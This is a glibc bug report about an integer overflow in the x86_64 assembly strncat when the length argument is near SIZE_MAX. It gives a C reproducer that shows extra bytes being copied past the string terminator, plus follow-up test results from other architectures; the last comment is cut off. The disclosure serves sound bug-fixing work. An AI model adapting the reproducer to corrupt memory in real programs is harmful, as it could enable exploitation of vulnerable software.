i want to see that coding some programs have error please check i like this subject and i am enjoying it but iam having some problem in looping so please help me. very nice to handle Post your Comment break loops here two print '*'. In this example, if we haven't use break statement thus... in the following example we have used break statement. In this the inner for loop... break   PHP Break ) break; else echo "$a\t"; } ?> Output: 1 2 3 4 Example...Break Control Structure: Break is a special kind of control structure which helps us to break any loop or sequence, like if we want to break the flow of any Continue and break statement is an example of break and continue statement. Example - public class ContinueBreak... is an example of break and continue statement. Example - public class ContinueBreak...Continue and break statement How can we use Continue and break Java Break while example Java Break while example  ... is a tool inside Java branching category. With the example below, how to terminate... label mass. Break While Loop Java The break Keyword The break Keyword "break" is the java keyword used to terminate the program execution.... In other word we can say that break keyword is used to prematurely exit C break continue example C break continue example In this section, you will learn how to use break statement... to force an immediate jump to the loop control statement. The break statement Java break for loop for Loop Example public class Java_break_for_loop { public static void... Java break for loop  ... baadshah. In the example, a labeled break statement is used to terminate for loop Break Statement in java 7 Break Statement in java 7 In this tutorial we will discuss about break statement in java 7. Break Statement : Java facilitate you to break the flow...-while, switch statement. Example : This is a simple example of unlabeled break Break a Line for text layout Break a Line for text layout In this section, we are providing you an example to break a line. To break down the text into lines, the class LineBreakMeasurer C Break for loop C Break for loop In this section, you will learn how to use break statement in a for loop. The break statement terminates the execution of the enclosing loop HTML5 break tag, Use of break <br/> in HTML5. HTML5 break tag, Use of break <br/> in HTML5. Introduction:In this tutorial, you will see the use of break <br />tag in HTML5. It is used for breaking a line. The content after break line will be display at new line JavaScript Break Continue Statement . Example 1(Break): <html> <head> <title>Write your title here...JavaScript Break-Continue Statement: Generally we need to put the break...;); break; } document.write(x+"<br/>"); } </script> Break statement in java Break statement in java Break statement in java is used to change the normal control flow of compound statement like while, do-while , for. Break...) break; } } } In the above example inside a for loop Java Break command in Java Example import javax.swing.*; public class Java_Break... Java Break command Java Break command is commonly used in terminating looping statements Java Break loop Java Break loop  ... of opposite nature, break and continue respectively. In the following example break... in terminating the loops. Break Loop Example Java Break Statement Java Break Statement  ... of java. It is used to terminate the loop coded inside the program. Example below demonstrates the working of break statement inside the program. This example Java Break keyword in Java an Example import javax.swing.*; public class Java_Break_keyword... Java Break keyword  ... and for handling these loops Java provides keywords such as break and continue Break Statement in JSP Break Statement in JSP The use of break statement is to escape... and do while loops. A break may only appear on one Use Break Statement in jsp code Use Break Statement in jsp code The break statement is used to terminate... outside the loop is executed. In the example given below the elements Java Break example Java Break example  ...; Java Break while example Break is often used in terminating... while etc. . Java break for loop Example PHP line break, PHP nl2br() function The PHP Line break example & code If you are developing the application... break in the text field and saves the data. If you the display the same data... the text will displayed without any line break. You can use the nl2br() function break and continue break and continue hi difference between break and continue What is BREAK? What is BREAK? What is BREAK? Hi, BREAK command clarify reports by suppressing repeated values, skipping lines & allowing for controlled break points. Thanks break and continue break and continue hi i am jane pls explain the difference between break and continue out of for loop Java Break out of for loop  ...; brief introduction about Java break label is demonstrated, along with this concise... statements. These Java labels are break and continue respectively. 'break' is mainly used C Break with Switch statement C Break with Switch statement In this section, you will learn how to use break statement..., but should not have the same value. The break statement ends the processing haimano August 20, 2011 at 11:52 AM i want to see that coding javasatya harsha.s.k September 23, 2011 at 3:20 PM some programs have error please check computerprashant gupta May 29, 2012 at 4:03 PM i like this subject and i am enjoying it but iam having some problem in looping so please help me. give some simple programsselva July 19, 2012 at 5:59 PM very nice to handle Post your Comment
http://roseindia.net/discussion/23050-Java-Break-example.html
CC-MAIN-2016-18
refinedweb
949
65.73
TCS Interview Experience Technical Round: After Clearing TNQT 2020, I got an interview call from TCS at Gitanjali Park Kolkata. In my panel, there were two panelists (probably TR and MR) but both asked me from Technical. - Which type of songs do you listen? - Why this type of song? - Asked about my projects in details. Asked me to explain each of my projects with diagram and code. - What is an anomaly? - What are the types of anomalies? Explain with an example. - How to avoid anomalies? - DDL, DML commands - Drop, Delete and Truncate difference. - What is schema? - What is table de<ni=on? - What is namespace in Python? - What is the view? - One interviewer drew two tables and asked me to write the view query. - What is data redundancy? - How data redundancy can lead to data inconsistency? Explain with example. - He wrote one array and one intermediate step of a merge sort algorithm, then he asked me to explain how “Merge” func=on will work after that step. HR Round: That HR guy grilled me a lot. He told me about the bond and service agreement, eligibility, etc. Then he asked me why I will not go for CTS and why TCS? CTS was giving higher package than TCS (He knew there was a CTS drive in our college before TCS interview). In this topic, only 20 minutes went. Worst HR experience ever.) - Nutanix Interview Experience for MTS - QA (4+ year experience) [ Language - Python ] -) - Amazon Interview Experience | Set 167 (SDE I for 1 year 6 months experience) - Walmart Interview Experience for SDE2 | Set 19 (3.8 years experience) - MindTickle Interview Experience | Off-campus | Fresher( 0-Yr Experience) - Oyo Rooms Interview Experience | Set 12 (4+ experience Backend Developer) - Mentor Graphics (Siemens) Interview Experience (For Experience – 3 yrs) | Sr. M.
https://www.geeksforgeeks.org/tcs-interview-experience-3/
CC-MAIN-2020-05
refinedweb
297
69.38
IRC log of tagmem on 2002-04-29 Timestamps are in UTC. 14:19:36 [RRSAgent] RRSAgent has joined #tagmem 14:19:40 [Zakim] Zakim has joined #tagmem 14:20:58 [Ian] Ian has changed the topic to: TAG teleconf 14:21:30 [Stuart] Stuart has joined #tagmem 14:24:40 [Stuart] zakim, who is here 14:24:41 [Zakim] Stuart, you need to end that query with '?' 14:24:47 [Stuart] zakim, who is here? 14:24:49 [Zakim] sorry, Stuart, I don't know what conference this is 14:25:04 [DanCon] Zakim, this is tag 14:25:05 [Zakim] ok, DanCon 14:25:09 [DanCon] Zakim, who's here? 14:25:11 [Zakim] I see ??P29 14:25:39 [Stuart] Hiya Dan 14:25:52 [Stuart] zakim, ??P29 is probably me 14:25:53 [Zakim] +Stuart?; got it 14:26:47 [Norm] Norm has joined #tagmem 14:27:13 [DanCon] Stuart, I did some scribbling in , but didn't make any really interesting progress. 14:28:41 [Chris] Chris has joined #tagmem 14:29:01 [Zakim] +N.Walsh 14:29:32 [Stuart] Ok... maybe we can get a quick update. Also, do you think it would be useful to discuss Larry's proposal? 14:30:00 [Ian] /me will be there in 1 minute 14:30:28 [Stuart] 14:31:00 [Zakim] +ChrisL 14:31:07 [TBray] TBray has joined #tagmem 14:31:18 [Norm] 0824, Dan 14:31:59 [Norm] zakim, who's here? 14:32:01 [Zakim] I see Stuart?, N.Walsh, ChrisL 14:32:03 [Zakim] +DanC 14:32:04 [Chris] Zakim, who is here? 14:32:05 [Zakim] I see Stuart?, N.Walsh, ChrisL, DanC 14:32:14 [Zakim] +??P34 14:32:23 [Norm] zakim, p43 is Roy 14:32:25 [Zakim] sorry, Norm, I do not recognize a party named 'p43' 14:32:27 [Chris] Zakim, ??P34 is Roy 14:32:28 [Zakim] +Roy; got it 14:32:46 [Norm] Yes, DanCon is right. I let my pilot remember, not Zakim, that's all. 14:33:28 [Zakim] +TBray 14:36:31 [Zakim] +Ian 14:36:53 [Ian] Regrets: PC, TBL 14:36:56 [Ian] zakim, who's here? 14:36:57 [Zakim] I see Stuart?, N.Walsh, ChrisL, DanC, Roy, TBray, Ian 14:37:28 [Ian] SW: Minutes accepted for 22 April: 14:38:33 [Ian] IJ: I propose to drop arch doc progress since I've made none. 14:39:15 [Ian] SW: General question about TAG agenda; driven from proactive to reactive. 14:39:27 [Ian] ...do others feel they'd like the balance to be more active than reactive? 14:39:32 [Ian] RF: I'd rather be working on the document. 14:39:46 [Ian] TB: It's important to not let the arch doc languish. 14:39:49 [Ian] CL: Agreed. 14:39:50 [Chris] agree 14:40:08 [Ian] TB: Let's put that on ftf agenda: 14:41:46 [Ian] IJ: I ack the problem of my inavailability these days. 14:42:01 [Ian] [FTF AGENDA: Unplugging IJ the bottleneck. :)] 14:42:22 [Ian] TB: IJ is not de facto available; what should we do? Should we do some of the editing ourselves? 14:44:28 [Ian] CL: It would give IJ less work if we polish our own sections. 14:45:26 [Ian] NW: With respect to: 14:45:38 [Ian] NW: My efforts petered out since I haven't heard consensus of opinion on some piecs. 14:45:45 [Ian] s/piecs/pieces/ 14:45:54 [DanCon] I'm quite happy with folks writing their own opinion and asking if other folks agree, Norm. 14:46:31 [Ian] CL: Not clear whether this section is addressing just "document-like" resources or all resources. 14:46:47 [Ian] NW: Trying to address all resources. Not sure that document v. data is useful architecturally. 14:47:36 [Ian] IJ: XAG 1.0 finds interesting to distinguish data-centric and user-centric content; but no formal distinction. 14:48:02 [Ian] SW: What about RF's writing on application state? 14:48:07 [Ian] 14:48:20 [Ian] RF: TBL, IJ, RF talked about this section. 14:48:29 [DanCon] ACTION Norm: take another pass over "what does a document mean" before the f2f" 14:48:48 [Ian] RF: Ball is in IJ's court. 14:48:57 [Ian] ------------------ 14:49:01 [Ian] Action item review: 14:49:04 [Ian] Closed: 14:49:11 [Ian] IJ: Publish draft finding on Media-Types (after edits) 14:49:26 [Ian] See comments from SW: 14:49:41 [Ian] 14:49:51 [Ian] CL: Prioritize comments on Guidelines for the use of XML in IETF protocols 14:50:10 [Ian] (CL will read these in other agenda items) 14:50:24 [Ian] Pending - DC: Write more on whenToUseGet 14:50:35 [Ian] ----------------------------- 14:50:39 [Ian] New issues 14:50:50 [Ian] 1) Review charmod lc2 14:50:54 [Ian] 14:51:00 [Ian] 2) Qnames as ids 14:51:06 [Ian] 14:51:15 [Chris] Get url of document from 14:51:21 [Ian] * Charmod 14:51:25 [Stuart] q? 14:51:36 [Zakim] +DOrchard 14:51:37 [Chris] q+ 14:51:38 [Ian] RF: Covers character requirements for every protocol. It's architectural in that it touches everyone. 14:52:27 [Ian] CL: Charmod introduces ability to put unicode-encoded URI ref in a document. Makes it a req that protocols say when it happens. 14:52:42 [Ian] ...Stuff you send over the wire is percent-encoded. But you can put company names in URIs. 14:53:03 [Ian] ...(e.g., on the side of a bus). Conversion to percent (hex) encoding doesn't change what goes over the wire. 14:53:06 [DanCon] I don't agree with the summary that Chris just gave. 14:53:25 [Ian] RF: I don't think that IRI will exist for long; not integrated in the URI draft. 14:53:53 [Ian] RF: I was opposed to IRI four years ago because they wanted to integrate it before having implementing it. 14:53:54 [David] David has joined #tagmem 14:53:55 [Ian] q? 14:54:25 [Ian] CL: This doc has several sections. Section 3 is on characters. With the exception of sorting, the entire section is a description of current practice. 14:54:57 [Ian] ...very good that all this is gathered into one place. 14:55:12 [Ian] CL: Normalization stuff is contentious but has benefits. 14:55:19 [DanCon] I sure wish they'd split the document. Hmm... I wonder if I asked them for that in so many words. 14:55:45 [Ian] CL: I with they'd split it up too 14:55:53 [Ian] CL: I recommend that the TAG review this document. 14:55:58 [DanCon] I 2nd the request to review 14:57:10 [Ian] IJ: What makes this document different from xforms? Significant impact on other work? 14:57:11 [Ian] CL: YEs. 14:57:39 [Ian] NW: I've committed to review for XML Core. I will send my comments to both core and tag. 14:57:46 [Ian] DC: Please tune your head differently for two reviews. 14:58:03 [Ian] CL: I volunteer to review and act as a liaison and coordinate comments. 14:58:23 [Ian] Action CL: Respond affirmative to Misha Wolf's request to review. 14:58:28 [Ian] DC: Deadlines? 14:58:39 [Chris] ACTIOn CL confirm with Misha that TAG will review entire document 14:59:09 [Ian] Yes. 14:59:12 [Chris] Last Call period begins 30 April 2002 and ends 31 May 2002. 14:59:29 [Ian] Action IJ: Add as issue charmod-17 14:59:32 [Ian] ----------- 14:59:36 [Ian] Qnames as Identifiers 14:59:41 [Ian] 14:59:43 [DanCon] hmm... TAG to finish its charmod review by 31 May? I doubt it. 14:59:55 [Ian] CL: I'm seeing increasing use of qnames as ids. 15:00:42 [Ian] CL gives some scenario that scribe missed: essentially, "Qname is a URI/name pair" 15:00:49 [Ian] ack Chris 15:00:59 [Ian] SW: Is there a new issue here? 15:01:16 [TBray] q+ 15:01:22 [Ian] ack DanCon 15:01:56 [Ian] DC: I think there is an issue. I think it's a myth that one can rewrite prefixes when one copies part of an xml doc from one section to another. 15:02:01 [Ian] ack TBray 15:02:40 [Ian] TB: For the record - I argued intensely when James Clark wrought this on the world that this was the wrong thing to do. I lost that argument. Now that the genie is out of the bottle, I'm not sure what we can say useful about it. 15:02:42 [Norm] q+ 15:03:02 [Ian] TB: There seems to be consensus that at the end of the day a qname is a URI/local name pair. What else needs to be said? 15:03:20 [DanCon] I gather Tim Bray's argument can now be summarized as 'I told you so.' 15:03:35 [Ian] TB: A qname is a prefix plus a string of characters. 15:03:42 [Ian] CL: What issues bit us? 15:03:48 [Chris] q+ 15:03:50 [Ian] TB: Bit us in the DOM. 15:04:06 [Ian] NW: I agree with TB - shouldn't have done this in the first place. But now we need to move on. 15:04:22 [DanCon] well, as to what we can do about it, I think we can say 'this sucks; sorry; deal; don't expect things to work nicely. 15:04:24 [Ian] CL: We can say: 15:04:26 [DanCon] ' 15:04:32 [Ian] a) Yes it's ok to use them 15:04:39 [Ian] b) We recommend that you use them. 15:05:02 [Ian] SW: I'm hearing making this an issue and issuing a finding? 15:05:09 [Ian] q? 15:05:13 [Ian] ack Norm 15:05:14 [Norm] ack norm 15:05:20 [Ian] DC: There's a lot of experience. We can condense it. 15:05:33 [Ian] DC: Not everyone knows the plusses and minuses. 15:05:43 [Ian] CL: Yes, I think a finding would be useful. 15:05:53 [Ian] SW: Volunteers? 15:06:25 [Ian] Resolved: Accept qnameAsId-18 as issue. 15:06:42 [Ian] Action NW: Draft a finding explaining advantages and disadvantages. 15:06:50 [Ian] CL: Keep it neutral - legal but pros and cons. 15:07:00 [Ian] DO: So it's not really an arch recommendation... 15:07:06 [DanCon] order, Stu, we're done accepting this issue 15:07:13 [Ian] q+ 15:07:19 [Ian] ack Chris 15:07:24 [Ian] ack Ian 15:07:38 [Ian] Norm, I recommend including examples (in general in fact) of bad usage (and good). 15:07:56 [Ian] Action IJ: Add issue to issues list. 15:07:58 [Ian] --------------------------- 15:08:47 [Ian] Finding: 15:09:07 [Ian] RF notes that IE Mac crashes on this document. 15:09:14 [DanCon] ooh, TimBray, I'm interested in clues on choosing which mozilla to use on a mac 15:09:21 [Ian] DC: I move we accept this draft. 15:09:26 [Ian] RF: I agree with SW comments (on tag@w3.org) 15:09:47 [Ian] 15:10:10 [Ian] SW summary of comments: 15:10:21 [Ian] 1) s/resource/response. Found this a bit jarring. 15:10:25 [Ian] CL: I agree with this. 15:10:52 [Ian] DC: The last meeting said "resolved s/resource/response" 15:11:05 [Ian] TB: The point was that we were talking about the bits received. 15:11:27 [Ian] DC: What IJ wrote is what I would have expected based on our meeting of last week. 15:11:43 [DanCon] [[ 15:11:43 [DanCon] Resolved: 15:11:43 [DanCon] 1. Publish this finding as accepted, without ns dispatch section, and having fixed charset sentence (s/resource/response). 15:11:47 [DanCon] ]] -- 15:11:52 [Ian] RF: This is wrong. 15:12:22 [Ian] RF: The finding says that representations only exist in responses. We're talking about media types. 15:12:41 [Ian] CL: Don't imply that some things only are found in responses. 15:13:02 [Ian] TB: I request that we take more time to review offline. 15:13:35 [Chris] url to read? 15:13:36 [Ian] DC: How do we make progress on this? 15:13:50 [Ian] 15:13:56 [Ian] Wrong uRI 15:14:09 [Ian] Read: 15:14:16 [Ian] Last modified: $Date: 2002/04/25 17:06:19 $ 15:14:19 [Ian] ---------------------------- 15:14:22 [Ian] FTF meeting agenda 15:15:26 [Ian] DC: TimBL on holiday this week. 15:15:40 [Ian] SW: Agenda suggestions? 15:15:52 [Ian] TB: Two things I'd like to accomplislh: 15:16:14 [Ian] a) Meta-work on arch document. Style, structure. I'm not satisfied with progress thus far. 15:16:35 [Ian] b) I'd like to drive a stake through whenToUseGet-7. 15:17:16 [Ian] TB: Soap 1.2 is going to go to last call soon. I suspect that at least TBL, RF, and I will have some issues about what's in there. 15:17:43 [Ian] TB: I'd like to be proactive, read SOAP 1.2, and identify architectural issues, come up with an action plan (who does what when). 15:18:03 [DanCon] if there's a suggestion to read "soap 1.2", please include dates and URIs of the specs; I gather the published /TR/ for SOAP isn't the thing to read. 15:18:16 [Ian] NW: I'd like progress on arch doc. Let's use ftf time to make progress on that and slow issues. 15:18:21 [Ian] DO: Sounds fine so far. 15:18:30 [Ian] RF: Already covered. 15:18:34 [Ian] CL: Already covered. 15:18:53 [David] Why is Ian crying? 15:18:56 [Ian] ;) 15:19:22 [Ian] DC: Mixed namespaces, if only to show ourselves that we won't make progress. 15:19:50 [Ian] Action SW and IJ: Work on ftf agenda. 15:19:55 [Ian] ======================== 15:20:03 [DanCon] Ian's falling on his sword cuz he sees himself as a bottleneck on the arch document, but Tim Bray was careful to say "I think it's important and I'm not satisifeid with the progress *we* are (not) making on it" 15:20:04 [Ian] 1. Guidelines For The Use of XML in IETF Protocols IETF best practices draft requiring URNs for XML namespaces in IETF documents. 15:20:04 [Ian] Action to take? 15:20:10 [Stuart] q 15:20:12 [Stuart] q? 15:21:00 [Ian] CL: Some comments on guidelines from editors suggest some fixes will take place (but wouldn't have occurred if charmod already a Rec) 15:21:25 [Ian] CL: Also, they say "should be well-formed". No. Must be well-formed. 15:21:28 [DanCon] (alread a REC *and* widely read and understood; unfortunately we can't publish directly into developer's minds) 15:21:38 [Norm] What Chris said, +100 :-) 15:21:51 [Ian] CL: I don't want a protocol coming out of IETF saying "Should be well-formed...." 15:21:56 [Ian] TB: Absolutely. 15:22:20 [Ian] SW: They expect to "roll a new one" in a week or two. 15:22:36 [Ian] TB: Larry Masinter has asked us to postpone discussion. 15:22:49 [Ian] LM: New draft expected "in a couple of weeks" 15:23:21 [Ian] 15:23:49 [Ian] SW: We will postpone discussion until that draft ready. 15:24:02 [Ian] -------------------------------- 15:24:18 [Ian] whenToUseGet-7 Review revised Finding, TAG consensus? ( 15:24:18 [Stuart] q+ 15:24:22 [Stuart] q- 15:24:31 [Ian] Draft findings: 15:24:34 [Chris] 15:24:49 [Ian] DC: See "Fodder" at bottom 15:24:53 [Ian] (of document) 15:25:43 [Ian] DC: See email from LM 15:25:55 [Ian] DC: I like this. 15:26:00 [Ian] TB: I think close to DC's version. 15:26:30 [Stuart] q? 15:26:36 [Ian] TB: Would you redraft your language using LM language? 15:27:00 [Ian] DC: Original findings didn't make the case for what you lose when you don't use get. I would add examples. 15:27:21 [Ian] DC: Also, the "browsers v. clients" distinction I don't agree with. I wanted to make this case. 15:29:12 [Ian] CL: If I bookmark results of submitting a form, I don't want the form posted again. I just want a URL to tracking info. In other cases, I do want form to be resubmitted each time. There are cases for each. 15:29:40 [Ian] TB: When you buy a book, for the safety criterion, this has to be done with a post anyhow. I think we are mixing the issues here. 15:29:51 [Ian] DC: LM pointed out that POST response can give a content location. 15:30:01 [Ian] TB: That's a safe way that's playing by the rules. 15:30:10 [Ian] RF: It isn't necessary to be limited to content location. 15:30:44 [Ian] CL: I'd like to have the option of bookmarking a post (when posts are safe). 15:30:50 [Ian] DC: If safe, shouldn't have been a POST. 15:30:55 [Ian] CL: Where do you put the message body? 15:31:11 [Ian] TB: If too complex, existing GET machinery probably not enough. Use Post. 15:31:21 [Ian] CL: Bad to crunch message bodies into percents. 15:31:25 [Ian] DC, TB: Why? 15:31:36 [Ian] CL: No meaning of bytes in URI space. 15:32:35 [Ian] RF: In practice, the only problem is when the char encoding is transcoded at some point. The body no longer corresponds to the same octets the server had. 15:32:36 [DanCon] Ian, don't try to minute this line by line. 15:32:40 [Ian] CL: I disagree with that. 15:33:26 [Ian] TB summarizing: CL is objecting to the utility in the general case of doing GETs on URIs that have complex args due to I18N issue. 15:33:39 [Ian] TB: Is that orthogonal to the main arch issue we are discussing? 15:33:56 [Ian] CL: No, since this is telling people to use something that's broken. 15:34:11 [DanCon] I don't think anything's broken. 15:34:32 [Ian] TB: Two sides to this - if you push web to post space, you lose a lot of benefits (e.g., application of crawlers, bookmarks, ...). 15:34:38 [Ian] TB: Isn't a better solution to fix the I18N solution. 15:34:39 [Ian] CL: Yes. 15:34:46 [DanCon] servers define the meaning of all URIs, not just ones with non-ascii form responses. 15:35:06 [Ian] CL: I still think kind of broken to percent-encode a document and stuff into a URI... 15:35:21 [Ian] DC: I can make same argument against pointy brackets... 15:35:44 [Ian] CL: If we recommend something, indicate corresponding drawbacks. 15:36:26 [Ian] DC: Do you agree with principle to use get for safe operations? 15:36:42 [Ian] CL: Yes, unless strong reasons to the contrary. 15:36:49 [Ian] TB: That's why it's "should". 15:36:57 [Chris] yeah, okay 15:37:04 [Ian] TB: I think DC's original document was sounds, and that DC should incorporate suggested improvements. 15:37:21 [Ian] RF: I'd like to refocus on the issue of "All important resources should have URIs." 15:38:13 [Ian] DO: Before getting closure here, how is this finding to be used? 15:38:21 [TBray] q+ 15:38:34 [Ian] DO: What is Web services to do with this? 15:39:01 [Ian] TB: Yes, I agree - some of our findings will be impactful on ongoing work. I think we need to be explicit about intended consequences. 15:39:25 [Chris] q+ 15:39:26 [Ian] DC: I'd like SOAP primer to say "At this time we don't have GET, so for safe operations don't use SOAP." 15:40:02 [Ian] TB: At ftf meeting, we can discuss how to build findings and how to work with people to incorporate. 15:40:05 [Ian] q? 15:40:10 [Ian] ack TBray 15:40:11 [David] q+ 15:40:37 [Ian] DC: The example used recently - Google API - you can use with GET or SOAP. 15:41:04 [Ian] DC: I would like (SOAP) specs to be clear that SOAP is not expected to be used for GET-like operations (e.g., get the weather). 15:41:26 [Ian] CL: The document primarily talks about HTTP. And talks about GET (but not safe methods). 15:41:55 [Ian] CL: It seems to me that one thing missing from finding - protocols should indicate their safe methods. 15:42:10 [Stuart] q? 15:42:26 [Ian] DC: SOAP is not a w3c-defined vocab of methods. "Make your own" 15:42:33 [Ian] DC: There are bindings to transport protocols. 15:42:51 [Ian] CL: If you see a new protocol you haven't met before, you should have a mechanism for querying whether a method is safe. 15:43:01 [Ian] RF: E.g., include a label in envelope? 15:43:05 [Ian] CL: Yes, for example. 15:43:24 [Ian] CL: In short: move away from the word "GET" and use "safe" instead. 15:43:27 [Ian] q? 15:43:31 [Ian] ack Chris 15:43:55 [TBray] q+ 15:44:24 [Ian] DO: I put a proposal out that one of the ways to handle this for the TAG to issue a finding that hiding everything behind POST isn't sufficient, and the TAG would like something more Web-friend (URIs and GET) and we'd like the WSA WG to deal with this issue. 15:44:48 [Ian] DO: The WSA WG has responsibility for glossary, examples, charters, etc. 15:45:13 [Ian] DO: This is not part of charter for SOAP 1.2. We could ask WSA to make this a high priority for later versions. 15:45:25 [Stuart] q? 15:45:28 [DanCon] sounds mostly good, but the "merry path" should include some "NOTE: this is an issue SOAP 1.2 doesn't address; stay tuned" stuff in the SOAP 1.2 spec 15:45:55 [Stuart] ack David 15:46:22 [Ian] TB: I think that this is the best way forward for process. I'm left with a grave concern for timing. What worries me is that huge amounts of info disappear behind POST> 15:47:00 [Ian] TB: Damage will be done if SOAP 1.2 goes to Rec creating an all-POST environment for Web services. 15:47:07 [Ian] q? 15:47:11 [Ian] ack TBary 15:47:25 [TBray] q- 15:47:33 [Ian] SW: People asking how to integrate GET. Responses have been "You could do that, but that wouldn't be very useful." 15:47:35 [David] q+ 15:47:57 [Ian] SW: The WG is working on the document. There is a small window of opportunity. 15:48:49 [Stuart] q? 15:48:52 [Ian] CL: Problem is if SOAP 1.3 is produced with safe methods but SOAP 1.2 meets everyone's needs adequately. 15:50:06 [Ian] DO: Things the WSA WG will be interesting to the Web services community (e.g., reliable methods). Therefore, I think a next version of SOAP with cool features including safe methods will not get lost. 15:50:40 [Ian] RF: In the IETF, the IESG can add a note at the beginning of the spec to say that additional work is going on to take care of issues a/b/c. 15:51:09 [DanCon] hmm... I don't think delaying SOAP 1.2 for this is the best idea, but the idea that stuff after SOAP 1.2 will get noticed... I wonder... there's a LOT of stuff being built now that cites SOAP 1.1. 15:51:26 [Ian] TB: HTTP/1.1 has been slow to catch on. 15:51:30 [Ian] q? 15:51:43 [Ian] q+ 15:52:17 [DanCon] RF/CL disagree with TB about speed of HTTP/1.1 15:52:33 [Ian] DO: What does the TAG think the XMLP WG should do with SOAP 1.2. I'm strongly arguing that the WG should be able to make progress (as is). 15:52:37 [Ian] ack David 15:54:15 [TBray] q+ 15:54:55 [Ian] ack Ian 15:55:20 [Ian] IJ: I think that TAG should provide comprehensive explanation of issue. Let larger community reach consensus as part of regular W3C process. 15:55:22 [Ian] ack TBary 15:55:24 [Ian] ack TBray 15:55:39 [Ian] TB: I think this is a problem that is not hard to solve technologically. 15:55:59 [Ian] TB: Do some people think it's much harder than what I've described elsewhere? 15:56:33 [Ian] TB: Wouldn't cover all of SOAP (e.g., not N-space conversations). 15:56:47 [Ian] DO: How do RF and DC feel about this type of solution. 15:56:49 [Ian] DC: It's good. 15:56:50 [DanCon] as to the idea that this issue is coming in late, I notified the XMLP WG of this issue, via Yves, when they were drafting their requirements. R612 15:58:51 [Ian] TB: Paul Prescod wrote an xml.com article about google - they published an API where there used to be a URI. The google result space vanishes from URI space as a result. Paul argues why the URI version was better for a lot of reasons. 15:59:02 [Ian] DO: I thought the article was well-written. 15:59:31 [Ian] 15:59:37 [TBray] 16:00:08 [Ian] DC: It would help me if DO said which way Google should have done it - it was done with GET and they switched. If there isn't agreement that it was better done with GET, I don't know how to write the finding. 16:00:53 [Ian] DO: I think that GET could be used for some of the SOAP calls. I don't like raising the case for using POST in general. But in the case of google, I think it's a fine usage of GET. 16:01:39 [Zakim] -DanC 16:02:00 [Ian] Adjourned 16:02:02 [Zakim] -Roy 16:02:04 [Zakim] -TBray 16:02:08 [Zakim] -Ian 16:02:10 [Zakim] -N.Walsh 16:02:10 [Zakim] -Stuart? 16:02:30 [Ian] RRSAgent, stop
http://www.w3.org/2002/04/29-tagmem-irc.html
CC-MAIN-2016-40
refinedweb
4,548
83.56
Tools used by the Docs Project From FedoraProject Documentation Project Tools We need a place to discuss our tools. Here are some blank Wiki pages we can fill. - DocsProject/Tools/ - The page you are staring at is probably all we need, but feel free to (ab)use the DocsProject/Tools/ namespace, eh. - DocsProject/Tools/Usage - Oh, yeah, wouldn't it be cool to tell people HOW to use our tools? Whee! - KarstenWade If you have any questions, please join the list and ask . Writing Plain Text and Email Ideas and first drafts are often written in plain text in the writer's favorite text editor. Concepts, snippets, and first drafts are passed around via email. This practice is a bit old school now, as the wiki has become the preferred draft/scratch space. Wiki The wiki is a good tool for collaborative community documentation. Easy to edit, version controlled, instant rendering, and flexible enough to allow for mind mapping . The Docs team uses the wiki as a place to draft documents before converting them to DocBook XML and putting them under standard source control management. The wiki is an easy way to gather a large amount of raw data, such as the Docs/Beats where the release notes are drafted. A wiki is a low barrier for entry with a low learning curve. Basic pages are easy to make, and more advanced instructions allow us to make documents that are more easily ported to other formats , such as XML. Gobby Gobby is a real time collaborative editing tool. One or more writers can work on a shared document at the same time, with each writer having a unique color to their writing. Writers can write around each other, correcting, adding, and changing the document at the same time. There is an associated chat window for coordination, although many times we continue in IRC instead. DocBook XML Writing whole books in DocBook XML is the best way to get the full advantage of this tool. The Docs team uses this format to support publishing and documents over the long term in multiple languages. DocBook has a rich semantic markup that allows a document to be useful for much more than reading. The Docs team has a set of [#Build_Tools build tools] to manipulate the XML files for translating, styling, and converting to other formats (HTML, PS, PDF, TXT). Build Tools Currently FDP uses a customized Makefile, with parts that live with each document that define local variables, and a Makefile-common that lives in the docs-common module in CVS. Our toolchain is specifically designed to be used as a generic documentation system. This is inline with the project goal of providing a 100% FLOSS documentation toolchain that works within a standard installation of Fedora. To build a document, you need the document's module from CVS and the docs-common module. A good module to look at first is the example-tutorial. It's purpose is to be a buildable bare template tutorial. You can obtain it via anonymous CVS: export CVSROOT=:pserver:anonymous@cvs.fedoraproject.org:/cvs/docs cvs -z3 login cvs -z3 co docs-common example-tutorial
http://fedoraproject.org/wiki/Tools_used_by_the_Docs_Project
CC-MAIN-2014-15
refinedweb
529
62.88
Apparently, on x86_64 (and other archs?) the asm version of strncat has an integer overflow similar to bug 19387. sysdeps/x86_64/multiarch/strcat-sse2-unaligned.S is used on my machine. I didn't look into the details but it looks like strncat(s1, s2, n) misbehave when n is near SIZE_MAX, strlen(s2) >= 34 and s2 has specific offset. For example, the program: ---------------------------------------------------------------------- #include <stdint.h> #include <stdalign.h> #include <string.h> #include <stdio.h> int main() { alignas(64) char s[144]; memset(s, 1, sizeof s); /* the first string... */ char *s1 = s; /* ...is at the start of the buffer */ s1[0] = 0; /* ...and is empty */ /* the second string... */ char *s2 = s + 95; /* ...starts as pos 95, */ memset(s2, 2, s + sizeof s - s2); /* ...filled with 2s for contrast */ s2[33] = 0; /* ...and has the length 33 */ printf("before:\n"); for (int i = 0; i < 50; i++) printf("%x", (unsigned char)s[i]); printf("...\n"); strncat(s1, s2, SIZE_MAX); printf("after:\n"); for (int i = 0; i < 50; i++) printf("%x", (unsigned char)s[i]); printf("...\n"); printf("%-33s^\n", "the string should end here"); } ---------------------------------------------------------------------- outputs this: ---------------------------------------------------------------------- before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222202222211111111111... the string should end here ^ ---------------------------------------------------------------------- Here, strncat put '\0' exactly where it should be but also copied 5 extra chars from s2 into s1 after '\0'. In other cases it copies less chars than required. Checked on x86_64: - git master (glibc-2.22-616-g5537f46) -- failed; - Debian jessie (glibc 2.19-18+deb8u1) -- failed; - Debian wheezy (eglibc 2.13-38+deb7u8) -- ok. Checked on x86_64 with gcc -m32: - Debian jessie (glibc 2.19-18+deb8u1) -- failed; - Debian wheezy (eglibc 2.13-38+deb7u8) -- ok. I didn't look into the details of 32-bit version. The bug can have evident security implications but using strncat with n=SIZE_MAX seems rare hence filing it publicly. I tried your code on ppc 32-bit, with glibc 2.20 as I didn't have 2.22 available. $ file bug bug: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped $ ./bug before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222201111111111111111... the string should end here ^ Tried the sample-code on ARM (Cortex A9) running Ubuntu 12.04. gcc 4.6.3 complained about missing stdalign.h. So had to replace 